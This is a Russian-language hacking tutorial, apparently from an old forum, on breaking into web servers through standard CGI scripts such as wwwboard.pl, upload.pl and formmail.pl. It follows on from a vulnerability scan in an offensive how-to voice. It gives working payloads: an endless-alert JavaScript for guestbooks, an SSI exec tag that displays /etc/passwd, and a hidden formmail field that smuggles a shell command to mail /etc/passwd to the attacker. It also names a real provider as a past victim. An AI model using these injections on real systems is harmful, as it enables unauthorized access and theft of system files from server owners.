|
Дыры в CGI скриптах
После того как вы воспользовались сканером и он используя свою базу эксплойтов нашел так называемые уязвимые места мы читаем следующее:
Известно, что многие владельцы веб-серверов пользуются стандартными скриптами CGI (common gateway interface), какие поставляет, например, Matt Wright ( его wwwboard.pl является, по-моему, самым распространенным скриптом на сегодняшний день ). Либо такие скрипты входят в комплект дистрибутива сервера, как, например, скрипт upload.pl входит в состав сервера Sambar. И уже почти ни для кого не секрет, что данные скрипты являются одним из тех мест, через которые либо кардер в поисках кредиток, либо подросток, возомнивший себя c00l h4x0r0m могут получить доступ к файлам, права пользователя или и то и другое на удалённой машине.
Методы получения неавторизованного доступа через стандартные CGI можно подразделить на следующие большие группы :
- Overflow. Скрипту передаётся заведомо большой запрос, что приводит к некорректной его обработке, и как следствие скрипт может не выполнить проверки на, скажем, передачу управления либо совершить непредусмотренные разработчиком действия. К скриптам такого рода относится, например, args.bat, прилагающийся к Website 1.x. Overflow - атака позволила в своё время взломать сервер ID Software.
- Доски/конференции. В настоящее время есть много скриптов, пишущих данные, переданные им, на Web-страницы. К ним относятся, например, все чаты, доски объявлений и гостевые книги. Если скрипт не выполняет проверки входных данных на тэги, это так же может привести к нежелательным результатам. Например следующий Javascript в гостевой книге заставит всех, кто посмотрит её, закрывать браузеры по kill process.
<SCRIPT>
{ while ( true ) window.alert('Game over, man'); }
</SCRIPT>
Или же, если сервер поддерживает SSI, запись подобной строги в книгу без проверки на тэги покажет всем кто смотрит её passwd:
<!--#exec cmd="/bin/cat /etc/passwd"-->
- Всякие mailer'a и прочее. Путём передачи управления, скажем, тому же sendmail'y реально получить по почте ;-) любой файл, на доступ к которому есть права у httpd. Скажем, если на www.host.com находится formmail, то создав страницу со следующими полями:
<FORM Method="POST" Action="http://www.host.com/cgi-bin/formmail.pl">
<INPUT TYPE="hidden" NAME="recipient"VALUE="some@email.com; /bin/mail your@email.com < /etc/passwd">
можно получить пресловутый passwd к себе в mailbox. Хочу добавить что этим способом был взломан првайдер www.mol.ru ,, вы можете зайти и убедиться сами, на одной из страниц, есть такая форма с использованием formmail.pl и кстати совсем недавно они это просекли и поправили скрипт.
|
|